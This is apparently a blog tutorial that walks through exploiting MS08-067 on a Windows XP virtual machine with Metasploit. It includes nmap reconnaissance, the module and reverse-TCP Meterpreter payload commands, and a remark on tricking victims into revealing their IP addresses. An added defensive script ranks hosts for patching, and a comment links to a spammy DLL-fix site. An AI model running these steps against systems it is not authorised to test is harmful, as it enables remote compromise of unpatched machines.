[METASPLOIT TUTORIAL] Hacking Windows XP Using IP Address

Do you think it is possible to hack someone's computer with just an IP address? The answer is yes, if the target is running an unpatched (vulnerable) OS. If you don't believe me, then read the full article.

In this article I am going to demonstrate how to hack a remote computer by exploiting the parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service (CVE-2008-4250). Before we jump into the actual exploitation process, let me give more details about this Server Service vulnerability.
Details about the Server Service Vulnerability (MS08-067):
Microsoft Windows Server service provides support for sharing resources such as files and print services over the network.
The Server service is vulnerable to a remote code-execution vulnerability. The vulnerability is caused by an error in netapi32.dll when processing directory traversal character sequences in path names. This can be exploited to corrupt stack memory by, e.g., sending RPC requests containing specially crafted path names to the Server Service component. The ‘NetprPathCanonicalize()’ function in the ‘netapi32.dll’ file is affected.
A malicious request to a vulnerable system results in complete compromise of that computer.
This vulnerability affects Windows XP, Windows 2000, Windows Server 2003, Windows Vista, and Windows Server 2008. However, attackers require authenticated access on Windows Vista and Server 2008 platforms to exploit this issue.
Exploiting the MS08-067 using Metasploit:
Step 1:

Create two virtual machines (VMs), namely “TARGET” and “KALI”. Install XP inside the TARGET VM and Kali Linux inside the KALI VM. Start the two VMs.
If you don’t know how to create virtual machines, then please read the VirtualBox Manual.
Step 2: Find the IP address of Target
Open the command prompt in the Target machine (XP). Type “ipconfig” to find the IP address of the Target system.
Hackers use different methods to find the IP address of a victim, for example by sending a link that collects the IP details or by using Angry IP Scanner.
Step 3: Information Gathering
Now let us collect some information about the Target machine. For this purpose, we are going to use the nmap tool.
Open the Terminal in the KALI machine (Kali Linux) and type “nmap -O” followed by the IP address of the Target machine. If you look at the result, you can find the list of open ports and the OS version.
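
An added example, not from the original article: a defender's triage of nmap grepable output (`-oG`) from your own network, ranking hosts for MS08-067 patching by the affected-platform list given above. The sample scan lines, function names and priority labels are constructed for illustration; nmap's OS match is only a guess, so confirm the patch state on each host.

```python
# Exposure tiers follow the article's affected-platform list.
NO_AUTH_NEEDED = ("Windows XP", "Windows 2000", "Windows Server 2003")
AUTH_NEEDED = ("Windows Vista", "Windows Server 2008")
SMB_PORTS = {139, 445}  # TCP ports on which the Server service is reached

# Constructed sample of nmap grepable (-oG) output; not real scan data.
SAMPLE_SCAN = (
    "Host: 192.168.56.101 ()\tStatus: Up\n"
    "Host: 192.168.56.101 ()\tPorts: 135/open/tcp//msrpc///, "
    "445/open/tcp//microsoft-ds///\tOS: Microsoft Windows XP SP2 or SP3\n"
    "Host: 192.168.56.102 ()\tPorts: 445/filtered/tcp//microsoft-ds///"
    "\tOS: Microsoft Windows Server 2003 SP2\n"
    "Host: 192.168.56.103 ()\tPorts: 139/open/tcp//netbios-ssn///, "
    "445/open/tcp//microsoft-ds///\tOS: Microsoft Windows Server 2008 SP1\n"
    "Host: 192.168.56.104 ()\tPorts: 22/open/tcp//ssh///\tOS: Linux 3.2 - 4.9\n"
)

def parse_line(line):
    """Return (ip, open_tcp_ports, os_guess) for a 'Ports:' line, else None."""
    fields = dict(f.split(": ", 1) for f in line.split("\t") if ": " in f)
    if "Host" not in fields or "Ports" not in fields:
        return None
    open_ports = set()
    for entry in fields["Ports"].split(","):
        parts = entry.strip().split("/")  # port/state/proto/owner/service/...
        if len(parts) >= 3 and parts[1] == "open" and parts[2] == "tcp":
            open_ports.add(int(parts[0]))
    return fields["Host"].split()[0], open_ports, fields.get("OS", "")

def classify(open_ports, os_guess):
    """Map one host to a patching priority for MS08-067."""
    if not open_ports & SMB_PORTS:
        return "smb-not-reachable"    # filtered/closed from this vantage point
    if any(name in os_guess for name in NO_AUTH_NEEDED):
        return "patch-first"          # reachable without credentials
    if any(name in os_guess for name in AUTH_NEEDED):
        return "patch-next"           # exploitation needs authenticated access
    return "smb-open-os-not-listed"

def audit(scan_text):
    """Return {ip: priority} for every host that has a Ports line."""
    report = {}
    for line in scan_text.splitlines():
        parsed = parse_line(line)
        if parsed:
            report[parsed[0]] = classify(parsed[1], parsed[2])
    return report

if __name__ == "__main__":
    for ip, priority in audit(SAMPLE_SCAN).items():
        print(f"{ip:16} {priority}")
```

A host marked "smb-not-reachable" may still be unpatched; the label only means the Server service was not reachable from where the scan ran.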

Step 4: Metasploit

Introduction to using Metasploit in Kali Linux

Now open the Terminal in the KALI machine (Kali Linux) and type “msfconsole”.

The msfconsole is the most popular interface to the Metasploit Framework. It provides an “all-in-one” centralized console and allows you efficient access to virtually all of the options available in the Metasploit Framework.
Let us use the search command to find the exploit modules with the keyword netapi. Type “search netapi”. Now you can see the list of modules that match netapi.

We are going to exploit MS08-067, so type “use exploit/windows/smb/ms08_067_netapi”.
Step 5: Set Payload
As usual, let us use the reverse TCP payload for this exploit also. Type “set payload windows/meterpreter/reverse_tcp” in the msfconsole.
Step 6: Options
Type “set LHOST” followed by the IP address of the KALI machine. You can find the IP address by typing the ‘ifconfig’ command in the Terminal.
Type “set RHOST” followed by the IP address of the Target machine.

Step 7: Exploiting
OK, it is time to exploit the vulnerability: type “exploit” in the console. If the exploit is successful, you can see the following result.

Now we can control the remote computer using the meterpreter. For example, typing “screenshot” will grab the screenshot of the victim system.

2 Responses

  1. Thanks for the post. You helped me. It has long been looking for solutions to this problem. Now I have still the problem was ISDone.dll. I can't solve this error. Then I found a website that helped me. Here is a link to the website http://fix4dll.com/isdone_dll.

  2. Ali Khan says:

    It's really amazing and helped me a lot for my project